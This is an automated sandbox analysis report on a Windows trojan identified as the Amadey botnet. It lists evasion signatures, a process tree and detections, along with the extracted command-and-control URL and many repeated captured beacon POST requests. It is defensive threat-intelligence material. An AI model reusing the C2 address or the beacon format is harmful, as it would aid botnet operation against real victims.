Windows Analysis Report
EXyAlLKIck.exe

Overview

General Information

Sample name: EXyAlLKIck.exe (renamed because original name is a hash value)
Original sample name: fddcf49860999a5147f34179c07c4bc6.exe
Analysis ID: 1483002
MD5: fddcf49860999a5147f34179c07c4bc6
SHA1: 9272c4c84a44387ff0546c33f8816de12e993d3d
SHA256: 0ec6f1e4ea70e94d4b6245ecb1ca8953515e41ad631af0fbdad75c2ab14c36e8
Tags: 32, exe, trojan
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Yara detected Amadey's stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • EXyAlLKIck.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\EXyAlLKIck.exe" MD5: FDDCF49860999A5147F34179C07C4BC6)
    • axplong.exe (PID: 728 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: FDDCF49860999A5147F34179C07C4BC6)
  • axplong.exe (PID: 5000 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: FDDCF49860999A5147F34179C07C4BC6)
  • axplong.exe (PID: 7856 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: FDDCF49860999A5147F34179C07C4BC6)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}
Source: 00000000.00000003.2014529476.0000000004F20000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 00000002.00000002.2085097235.00000000006A1000.00000040.00000001.01000000.00000007.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 00000003.00000003.2045418136.0000000004A30000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 00000000.00000002.2054954455.0000000000751000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 00000007.00000003.2671343641.00000000050D0000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security

Source: 7.2.axplong.exe.6a0000.0.unpack | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 0.2.EXyAlLKIck.exe.750000.0.unpack | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 3.2.axplong.exe.6a0000.0.unpack | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security
Source: 2.2.axplong.exe.6a0000.0.unpack | Rule: JoeSecurity_Amadey_2 | Description: Yara detected Amadey's stealer DLL | Author: Joe Security

No Sigma rule has matched
No Snort rule has matched
Timestamp: 2024-07-26T13:44:21.031169+0200 | SID: 2856147 | Source Port: 53662 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T13:43:32.829875+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 53645 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T13:43:14.534208+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 49704 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T13:44:27.104268+0200 | SID: 2856147 | Source Port: 53667 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T13:43:33.868995+0200 | SID: 2022930 | Source Port: 443 | Destination Port: 53646 | Protocol: TCP | Classtype: A Network Trojan was detected
Timestamp: 2024-07-26T13:44:03.059226+0200 | SID: 2856147 | Source Port: 53647 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected

AV Detection

Source: EXyAlLKIck.exe | Avira: detected
Source: http://185.215.113.16/Jo89Ku7d/index.php32 | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/ | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpc | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpp; | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php= | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpy | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpZ | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpx | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpded | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpt | Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.php3 | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: axplong.exe.7856.7.memstrmin | Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe | Joe Sandbox ML: detected
Source: EXyAlLKIck.exe | Joe Sandbox ML: detected
Source: EXyAlLKIck.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: Malware configuration extractor | IPs: 185.215.113.16

Source: global traffic | HTTP traffic detected:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s

Source: global traffic | HTTP traffic detected:
POST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 156
Cache-Control: no-cache
Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
